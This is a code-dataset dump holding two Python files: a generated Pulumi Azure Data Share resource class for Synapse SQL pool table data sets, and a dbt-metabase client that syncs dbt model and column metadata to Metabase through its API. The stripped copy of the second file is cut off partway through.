synapse_workspace_sql_pool_table_resource_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A Synapse Workspace Sql Pool Table data set.
API Version: 2020-09-01.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the share account.
:param pulumi.Input[str] data_set_name: The name of the dataSet.
:param pulumi.Input[str] kind: Kind of data set.
Expected value is 'SynapseWorkspaceSqlPoolTable'.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] share_name: The name of the share to add the data set to.
:param pulumi.Input[str] synapse_workspace_sql_pool_table_resource_id: Resource id of the Synapse Workspace SQL Pool Table
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SynapseWorkspaceSqlPoolTableDataSetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A Synapse Workspace Sql Pool Table data set.
API Version: 2020-09-01.
:param str resource_name: The name of the resource.
:param SynapseWorkspaceSqlPoolTableDataSetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SynapseWorkspaceSqlPoolTableDataSetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_name: Optional[pulumi.Input[str]] = None,
synapse_workspace_sql_pool_table_resource_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SynapseWorkspaceSqlPoolTableDataSetArgs.__new__(SynapseWorkspaceSqlPoolTableDataSetArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["data_set_name"] = data_set_name
if kind is None and not opts.urn:
raise TypeError("Missing required property 'kind'")
__props__.__dict__["kind"] = 'SynapseWorkspaceSqlPoolTable'
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if share_name is None and not opts.urn:
raise TypeError("Missing required property 'share_name'")
__props__.__dict__["share_name"] = share_name
if synapse_workspace_sql_pool_table_resource_id is None and not opts.urn:
raise TypeError("Missing required property 'synapse_workspace_sql_pool_table_resource_id'")
__props__.__dict__["synapse_workspace_sql_pool_table_resource_id"] = synapse_workspace_sql_pool_table_resource_id
__props__.__dict__["data_set_id"] = None
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:datashare:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20181101preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20181101preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20191101:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20191101:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20200901:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20200901:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20201001preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20201001preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20210801:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20210801:SynapseWorkspaceSqlPoolTableDataSet")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SynapseWorkspaceSqlPoolTableDataSet, __self__).__init__(
'azure-native:datashare:SynapseWorkspaceSqlPoolTableDataSet',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SynapseWorkspaceSqlPoolTableDataSet':
"""
Get an existing SynapseWorkspaceSqlPoolTableDataSet resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = SynapseWorkspaceSqlPoolTableDataSetArgs.__new__(SynapseWorkspaceSqlPoolTableDataSetArgs)
__props__.__dict__["data_set_id"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["synapse_workspace_sql_pool_table_resource_id"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return SynapseWorkspaceSqlPoolTableDataSet(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="dataSetId")
def data_set_id(self) -> pulumi.Output[str]:
"""
Unique id for identifying a data set resource
"""
return pulumi.get(self, "data_set_id")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
Kind of data set.
Expected value is 'SynapseWorkspaceSqlPoolTable'.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the azure resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="synapseWorkspaceSqlPoolTableResourceId")
def synapse_workspace_sql_pool_table_resource_id(self) -> pulumi.Output[str]:
"""
Resource id of the Synapse Workspace SQL Pool Table
"""
return pulumi.get(self, "synapse_workspace_sql_pool_table_resource_id")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
System Data of the Azure resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Type of the azure resource
"""
return pulumi.get(self, "type")
| 46.936842 | 1,089 | 0.676684 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = ['SynapseWorkspaceSqlPoolTableDataSetArgs', 'SynapseWorkspaceSqlPoolTableDataSet']
@pulumi.input_type
class SynapseWorkspaceSqlPoolTableDataSetArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
kind: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
share_name: pulumi.Input[str],
synapse_workspace_sql_pool_table_resource_id: pulumi.Input[str],
data_set_name: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "kind", 'SynapseWorkspaceSqlPoolTable')
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "share_name", share_name)
pulumi.set(__self__, "synapse_workspace_sql_pool_table_resource_id", synapse_workspace_sql_pool_table_resource_id)
if data_set_name is not None:
pulumi.set(__self__, "data_set_name", data_set_name)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def kind(self) -> pulumi.Input[str]:
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: pulumi.Input[str]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="shareName")
def share_name(self) -> pulumi.Input[str]:
return pulumi.get(self, "share_name")
@share_name.setter
def share_name(self, value: pulumi.Input[str]):
pulumi.set(self, "share_name", value)
@property
@pulumi.getter(name="synapseWorkspaceSqlPoolTableResourceId")
def synapse_workspace_sql_pool_table_resource_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "synapse_workspace_sql_pool_table_resource_id")
@synapse_workspace_sql_pool_table_resource_id.setter
def synapse_workspace_sql_pool_table_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "synapse_workspace_sql_pool_table_resource_id", value)
@property
@pulumi.getter(name="dataSetName")
def data_set_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "data_set_name")
@data_set_name.setter
def data_set_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_set_name", value)
class SynapseWorkspaceSqlPoolTableDataSet(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_name: Optional[pulumi.Input[str]] = None,
synapse_workspace_sql_pool_table_resource_id: Optional[pulumi.Input[str]] = None,
__props__=None):
...
@overload
def __init__(__self__,
resource_name: str,
args: SynapseWorkspaceSqlPoolTableDataSetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SynapseWorkspaceSqlPoolTableDataSetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_name: Optional[pulumi.Input[str]] = None,
synapse_workspace_sql_pool_table_resource_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SynapseWorkspaceSqlPoolTableDataSetArgs.__new__(SynapseWorkspaceSqlPoolTableDataSetArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["data_set_name"] = data_set_name
if kind is None and not opts.urn:
raise TypeError("Missing required property 'kind'")
__props__.__dict__["kind"] = 'SynapseWorkspaceSqlPoolTable'
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if share_name is None and not opts.urn:
raise TypeError("Missing required property 'share_name'")
__props__.__dict__["share_name"] = share_name
if synapse_workspace_sql_pool_table_resource_id is None and not opts.urn:
raise TypeError("Missing required property 'synapse_workspace_sql_pool_table_resource_id'")
__props__.__dict__["synapse_workspace_sql_pool_table_resource_id"] = synapse_workspace_sql_pool_table_resource_id
__props__.__dict__["data_set_id"] = None
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:datashare:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20181101preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20181101preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20191101:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20191101:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20200901:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20200901:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20201001preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20201001preview:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-native:datashare/v20210801:SynapseWorkspaceSqlPoolTableDataSet"), pulumi.Alias(type_="azure-nextgen:datashare/v20210801:SynapseWorkspaceSqlPoolTableDataSet")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SynapseWorkspaceSqlPoolTableDataSet, __self__).__init__(
'azure-native:datashare:SynapseWorkspaceSqlPoolTableDataSet',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SynapseWorkspaceSqlPoolTableDataSet':
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = SynapseWorkspaceSqlPoolTableDataSetArgs.__new__(SynapseWorkspaceSqlPoolTableDataSetArgs)
__props__.__dict__["data_set_id"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["synapse_workspace_sql_pool_table_resource_id"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return SynapseWorkspaceSqlPoolTableDataSet(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="dataSetId")
def data_set_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "data_set_id")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
return pulumi.get(self, "name")
@property
@pulumi.getter(name="synapseWorkspaceSqlPoolTableResourceId")
def synapse_workspace_sql_pool_table_resource_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "synapse_workspace_sql_pool_table_resource_id")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
return pulumi.get(self, "type")
| true | true |
1c33247d1ebd76b37c331b06ae4b8b207ceb0b05 | 16,856 | py | Python | dbtmetabase/metabase.py | venturehacks/dbt-metabase | 8fd76c5b2dab180fca24b6742b68f5f668a3e7cb | [
"MIT"
] | null | null | null | dbtmetabase/metabase.py | venturehacks/dbt-metabase | 8fd76c5b2dab180fca24b6742b68f5f668a3e7cb | [
"MIT"
] | null | null | null | dbtmetabase/metabase.py | venturehacks/dbt-metabase | 8fd76c5b2dab180fca24b6742b68f5f668a3e7cb | [
"MIT"
] | null | null | null | import json
import logging
from typing import Any, Sequence, Optional, Tuple, Iterable, MutableMapping, Union
import requests
import time
from .models.metabase import MetabaseModel, MetabaseColumn
class MetabaseClient:
"""Metabase API client."""
_SYNC_PERIOD_SECS = 5
def __init__(
self,
host: str,
user: str,
password: str,
use_http: bool = False,
verify: Union[str, bool] = None,
):
"""Constructor.
Arguments:
host {str} -- Metabase hostname.
user {str} -- Metabase username.
password {str} -- Metabase password.
Keyword Arguments:
use_http {bool} -- Use HTTP instead of HTTPS. (default: {False})
verify {Union[str, bool]} -- Path to certificate or disable verification. (default: {None})
"""
self.host = host
self.protocol = "http" if use_http else "https"
self.verify = verify
self.session_id = self.get_session_id(user, password)
logging.info("Session established successfully")
def get_session_id(self, user: str, password: str) -> str:
"""Obtains new session ID from API.
Arguments:
user {str} -- Metabase username.
password {str} -- Metabase password.
Returns:
str -- Session ID.
"""
return self.api(
"post",
"/api/session",
authenticated=False,
json={"username": user, "password": password},
)["id"]
def sync_and_wait(
self, database: str, schema: str, models: Sequence, timeout: Optional[int]
) -> bool:
"""Synchronize with the database and wait for schema compatibility.
Arguments:
database {str} -- Metabase database name.
schema {str} -- Metabase schema name.
models {list} -- List of dbt models read from project.
Keyword Arguments:
timeout {int} -- Timeout before giving up in seconds. (default: {30})
Returns:
bool -- True if schema compatible with models, false if still incompatible.
"""
if timeout is None:
timeout = 30
if timeout < self._SYNC_PERIOD_SECS:
logging.critical(
"Timeout provided %d secs, must be at least %d",
timeout,
self._SYNC_PERIOD_SECS,
)
return False
database_id = self.find_database_id(database)
if not database_id:
logging.critical("Cannot find database by name %s", database)
return False
self.api("post", f"/api/database/{database_id}/sync_schema")
deadline = int(time.time()) + timeout
sync_successful = False
while True:
sync_successful = self.models_compatible(database_id, schema, models)
time_after_wait = int(time.time()) + self._SYNC_PERIOD_SECS
if not sync_successful and time_after_wait <= deadline:
time.sleep(self._SYNC_PERIOD_SECS)
else:
break
return sync_successful
def models_compatible(
self, database_id: str, schema: str, models: Sequence
) -> bool:
"""Checks if models compatible with the Metabase database schema.
Arguments:
database_id {str} -- Metabase database ID.
schema {str} -- Metabase schema name.
models {list} -- List of dbt models read from project.
Returns:
bool -- True if schema compatible with models, false otherwise.
"""
_, field_lookup = self.build_metadata_lookups(database_id, schema)
are_models_compatible = True
for model in models:
schema_name = model.schema.upper()
model_name = model.name.upper()
lookup_key = f"{schema_name}.{model_name}"
if lookup_key not in field_lookup:
logging.warning(
"Model %s not found in %s schema", lookup_key, schema_name
)
are_models_compatible = False
else:
table_lookup = field_lookup[lookup_key]
for column in model.columns:
column_name = column.name.upper()
if column_name not in table_lookup:
logging.warning(
"Column %s not found in %s model", column_name, lookup_key
)
are_models_compatible = False
return are_models_compatible
def export_models(
self, database: str, schema: str, models: Sequence[MetabaseModel], aliases
):
"""Exports dbt models to Metabase database schema.
Arguments:
database {str} -- Metabase database name.
schema {str} -- Metabase schema name.
models {list} -- List of dbt models read from project.
aliases {dict} -- Provided by reader class. Shuttled down to column exports to resolve FK refs against relations to aliased source tables
"""
database_id = self.find_database_id(database)
if not database_id:
logging.critical("Cannot find database by name %s", database)
return
table_lookup, field_lookup = self.build_metadata_lookups(database_id, schema)
for model in models:
self.export_model(model, table_lookup, field_lookup, aliases)
def export_model(
self,
model: MetabaseModel,
table_lookup: dict,
field_lookup: dict,
aliases: dict,
):
"""Exports one dbt model to Metabase database schema.
Arguments:
model {dict} -- One dbt model read from project.
table_lookup {dict} -- Dictionary of Metabase tables indexed by name.
field_lookup {dict} -- Dictionary of Metabase fields indexed by name, indexed by table name.
aliases {dict} -- Provided by reader class. Shuttled down to column exports to resolve FK refs against relations to aliased source tables
"""
schema_name = model.schema.upper()
model_name = model.name.upper()
lookup_key = f"{schema_name}.{aliases.get(model_name, model_name)}"
api_table = table_lookup.get(lookup_key)
if not api_table:
logging.error("Table %s does not exist in Metabase", lookup_key)
return
# Empty strings not accepted by Metabase
if not model.description:
model_description = None
else:
model_description = model.description
table_id = api_table["id"]
if api_table["description"] != model_description and model_description:
# Update with new values
self.api(
"put",
f"/api/table/{table_id}",
json={"description": model_description},
)
logging.info("Updated table %s successfully", lookup_key)
elif not model_description:
logging.info("No model description provided for table %s", lookup_key)
else:
logging.info("Table %s is up-to-date", lookup_key)
for column in model.columns:
self.export_column(schema_name, model_name, column, field_lookup, aliases)
def export_column(
self,
schema_name: str,
model_name: str,
column: MetabaseColumn,
field_lookup: dict,
aliases: dict,
):
"""Exports one dbt column to Metabase database schema.
Arguments:
model_name {str} -- One dbt model name read from project.
column {dict} -- One dbt column read from project.
field_lookup {dict} -- Dictionary of Metabase fields indexed by name, indexed by table name.
aliases {dict} -- Provided by reader class. Used to resolve FK refs against relations to aliased source tables
"""
table_lookup_key = f"{schema_name}.{model_name}"
column_name = column.name.upper()
field = field_lookup.get(table_lookup_key, {}).get(column_name)
if not field:
logging.error(
"Field %s.%s does not exist in Metabase", table_lookup_key, column_name
)
return
field_id = field["id"]
api_field = self.api("get", f"/api/field/{field_id}")
if "special_type" in api_field:
semantic_type = "special_type"
else:
semantic_type = "semantic_type"
fk_target_field_id = None
if column.semantic_type == "type/FK":
# Target table could be aliased if we parse_ref() on a source, so we caught aliases during model parsing
# This way we can unpack any alias mapped to fk_target_table when using yml folder parser
target_table = (
column.fk_target_table.upper()
if column.fk_target_table is not None
else None
)
target_field = (
column.fk_target_field.upper()
if column.fk_target_field is not None
else None
)
if not target_table or not target_field:
logging.info(
"Passing on fk resolution for %s. Target field %s was not resolved during dbt model parsing.",
table_lookup_key,
target_field,
)
else:
# Now we can trust our parse_ref even if it is pointing to something like source("salesforce", "my_cool_table_alias")
# just as easily as a simple ref("stg_salesforce_cool_table") -> the dict is empty if parsing from manifest.json
was_aliased = (
aliases.get(target_table.split(".", 1)[-1])
if target_table
else None
)
if was_aliased:
target_table = ".".join(
[target_table.split(".", 1)[0], was_aliased]
)
logging.info(
"Looking for field %s in table %s", target_field, target_table
)
fk_target_field_id = (
field_lookup.get(target_table, {}).get(target_field, {}).get("id")
)
if fk_target_field_id:
logging.info(
"Setting target field %s to PK in order to facilitate FK ref for %s column",
fk_target_field_id,
column_name,
)
self.api(
"put",
f"/api/field/{fk_target_field_id}",
json={semantic_type: "type/PK"},
)
else:
logging.error(
"Unable to find foreign key target %s.%s",
target_table,
target_field,
)
# Nones are not accepted, default to normal
if not column.visibility_type:
column.visibility_type = "normal"
# Empty strings not accepted by Metabase
if not column.description:
column_description = None
else:
column_description = column.description
if (
api_field["description"] != column_description
or api_field[semantic_type] != column.semantic_type
or api_field["visibility_type"] != column.visibility_type
or api_field["fk_target_field_id"] != fk_target_field_id
):
# Update with new values
self.api(
"put",
f"/api/field/{field_id}",
json={
"description": column_description,
semantic_type: column.semantic_type,
"visibility_type": column.visibility_type,
"fk_target_field_id": fk_target_field_id,
},
)
logging.info("Updated field %s.%s successfully", model_name, column_name)
else:
logging.info("Field %s.%s is up-to-date", model_name, column_name)
def find_database_id(self, name: str) -> Optional[str]:
"""Finds Metabase database ID by name.
Arguments:
name {str} -- Metabase database name.
Returns:
str -- Metabase database ID.
"""
for database in self.api("get", "/api/database"):
if database["name"].upper() == name.upper():
return database["id"]
return None
def build_metadata_lookups(
self, database_id: str, schema: str, schemas_to_exclude: Iterable = None
) -> Tuple[dict, dict]:
"""Builds table and field lookups.
Arguments:
database_id {str} -- Metabase database ID.
schema {str} -- Metabase schema name.
Returns:
dict -- Dictionary of tables indexed by name.
dict -- Dictionary of fields indexed by name, indexed by table name.
"""
if schemas_to_exclude is None:
schemas_to_exclude = []
table_lookup = {}
field_lookup = {}
metadata = self.api(
"get",
f"/api/database/{database_id}/metadata",
params=dict(include_hidden=True),
)
for table in metadata.get("tables", []):
table_schema = table.get("schema", "public").upper()
table_name = table["name"].upper()
if schema:
if table_schema != schema.upper():
logging.debug(
"Ignoring Metabase table %s in schema %s. It does not belong to selected schema %s",
table_name,
table_schema,
schema,
)
continue
if schemas_to_exclude:
schemas_to_exclude = {
exclusion.upper() for exclusion in schemas_to_exclude
}
if table_schema in schemas_to_exclude:
logging.debug(
"Ignoring Metabase table %s in schema %s. It belongs to excluded schemas %s",
table_name,
table_schema,
schemas_to_exclude,
)
continue
lookup_key = f"{table_schema}.{table_name}"
table_lookup[lookup_key] = table
table_field_lookup = {}
for field in table.get("fields", []):
field_name = field["name"].upper()
table_field_lookup[field_name] = field
field_lookup[lookup_key] = table_field_lookup
return table_lookup, field_lookup
def api(
self,
method: str,
path: str,
authenticated: bool = True,
critical: bool = True,
**kwargs,
) -> Any:
"""Unified way of calling Metabase API.
Arguments:
method {str} -- HTTP verb, e.g. get, post, put.
path {str} -- Relative path of endpoint, e.g. /api/database.
Keyword Arguments:
authenticated {bool} -- Includes session ID when true. (default: {True})
critical {bool} -- Raise on any HTTP errors. (default: {True})
Returns:
Any -- JSON payload of the endpoint.
"""
headers: MutableMapping = {}
if "headers" not in kwargs:
kwargs["headers"] = headers
else:
headers = kwargs["headers"].copy()
if authenticated:
headers["X-Metabase-Session"] = self.session_id
response = requests.request(
method, f"{self.protocol}://{self.host}{path}", verify=self.verify, **kwargs
)
if critical:
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
if "password" in kwargs["json"]:
logging.error("HTTP request failed. Response: %s", response.text)
else:
logging.error(
"HTTP request failed. Payload: %s. Response: %s",
kwargs["json"],
response.text,
)
raise
elif not response.ok:
return False
response_json = json.loads(response.text)
# Since X.40.0 responses are encapsulated in "data" with pagination parameters
if "data" in response_json:
return response_json["data"]
return response_json
| 35.116667 | 149 | 0.54669 | import json
import logging
from typing import Any, Sequence, Optional, Tuple, Iterable, MutableMapping, Union
import requests
import time
from .models.metabase import MetabaseModel, MetabaseColumn
class MetabaseClient:
_SYNC_PERIOD_SECS = 5
def __init__(
self,
host: str,
user: str,
password: str,
use_http: bool = False,
verify: Union[str, bool] = None,
):
self.host = host
self.protocol = "http" if use_http else "https"
self.verify = verify
self.session_id = self.get_session_id(user, password)
logging.info("Session established successfully")
def get_session_id(self, user: str, password: str) -> str:
return self.api(
"post",
"/api/session",
authenticated=False,
json={"username": user, "password": password},
)["id"]
def sync_and_wait(
self, database: str, schema: str, models: Sequence, timeout: Optional[int]
) -> bool:
if timeout is None:
timeout = 30
if timeout < self._SYNC_PERIOD_SECS:
logging.critical(
"Timeout provided %d secs, must be at least %d",
timeout,
self._SYNC_PERIOD_SECS,
)
return False
database_id = self.find_database_id(database)
if not database_id:
logging.critical("Cannot find database by name %s", database)
return False
self.api("post", f"/api/database/{database_id}/sync_schema")
deadline = int(time.time()) + timeout
sync_successful = False
while True:
sync_successful = self.models_compatible(database_id, schema, models)
time_after_wait = int(time.time()) + self._SYNC_PERIOD_SECS
if not sync_successful and time_after_wait <= deadline:
time.sleep(self._SYNC_PERIOD_SECS)
else:
break
return sync_successful
def models_compatible(
self, database_id: str, schema: str, models: Sequence
) -> bool:
_, field_lookup = self.build_metadata_lookups(database_id, schema)
are_models_compatible = True
for model in models:
schema_name = model.schema.upper()
model_name = model.name.upper()
lookup_key = f"{schema_name}.{model_name}"
if lookup_key not in field_lookup:
logging.warning(
"Model %s not found in %s schema", lookup_key, schema_name
)
are_models_compatible = False
else:
table_lookup = field_lookup[lookup_key]
for column in model.columns:
column_name = column.name.upper()
if column_name not in table_lookup:
logging.warning(
"Column %s not found in %s model", column_name, lookup_key
)
are_models_compatible = False
return are_models_compatible
def export_models(
self, database: str, schema: str, models: Sequence[MetabaseModel], aliases
):
database_id = self.find_database_id(database)
if not database_id:
logging.critical("Cannot find database by name %s", database)
return
table_lookup, field_lookup = self.build_metadata_lookups(database_id, schema)
for model in models:
self.export_model(model, table_lookup, field_lookup, aliases)
def export_model(
self,
model: MetabaseModel,
table_lookup: dict,
field_lookup: dict,
aliases: dict,
):
schema_name = model.schema.upper()
model_name = model.name.upper()
lookup_key = f"{schema_name}.{aliases.get(model_name, model_name)}"
api_table = table_lookup.get(lookup_key)
if not api_table:
logging.error("Table %s does not exist in Metabase", lookup_key)
return
if not model.description:
model_description = None
else:
model_description = model.description
table_id = api_table["id"]
if api_table["description"] != model_description and model_description:
self.api(
"put",
f"/api/table/{table_id}",
json={"description": model_description},
)
logging.info("Updated table %s successfully", lookup_key)
elif not model_description:
logging.info("No model description provided for table %s", lookup_key)
else:
logging.info("Table %s is up-to-date", lookup_key)
for column in model.columns:
self.export_column(schema_name, model_name, column, field_lookup, aliases)
def export_column(
self,
schema_name: str,
model_name: str,
column: MetabaseColumn,
field_lookup: dict,
aliases: dict,
):
table_lookup_key = f"{schema_name}.{model_name}"
column_name = column.name.upper()
field = field_lookup.get(table_lookup_key, {}).get(column_name)
if not field:
logging.error(
"Field %s.%s does not exist in Metabase", table_lookup_key, column_name
)
return
field_id = field["id"]
api_field = self.api("get", f"/api/field/{field_id}")
if "special_type" in api_field:
semantic_type = "special_type"
else:
semantic_type = "semantic_type"
fk_target_field_id = None
if column.semantic_type == "type/FK":
target_table = (
column.fk_target_table.upper()
if column.fk_target_table is not None
else None
)
target_field = (
column.fk_target_field.upper()
if column.fk_target_field is not None
else None
)
if not target_table or not target_field:
logging.info(
"Passing on fk resolution for %s. Target field %s was not resolved during dbt model parsing.",
table_lookup_key,
target_field,
)
else:
was_aliased = (
aliases.get(target_table.split(".", 1)[-1])
if target_table
else None
)
if was_aliased:
target_table = ".".join(
[target_table.split(".", 1)[0], was_aliased]
)
logging.info(
"Looking for field %s in table %s", target_field, target_table
)
fk_target_field_id = (
field_lookup.get(target_table, {}).get(target_field, {}).get("id")
)
if fk_target_field_id:
logging.info(
"Setting target field %s to PK in order to facilitate FK ref for %s column",
fk_target_field_id,
column_name,
)
self.api(
"put",
f"/api/field/{fk_target_field_id}",
json={semantic_type: "type/PK"},
)
else:
logging.error(
"Unable to find foreign key target %s.%s",
target_table,
target_field,
)
if not column.visibility_type:
column.visibility_type = "normal"
if not column.description:
column_description = None
else:
column_description = column.description
if (
api_field["description"] != column_description
or api_field[semantic_type] != column.semantic_type
or api_field["visibility_type"] != column.visibility_type
or api_field["fk_target_field_id"] != fk_target_field_id
):
self.api(
"put",
f"/api/field/{field_id}",
json={
"description": column_description,
semantic_type: column.semantic_type,
"visibility_type": column.visibility_type,
"fk_target_field_id": fk_target_field_id,
},
)
logging.info("Updated field %s.%s successfully", model_name, column_name)
else:
logging.info("Field %s.%s is up-to-date", model_name, column_name)
def find_database_id(self, name: str) -> Optional[str]:
for database in self.api("get", "/api/database"):
if database["name"].upper() == name.upper():
return database["id"]
return None
def build_metadata_lookups(
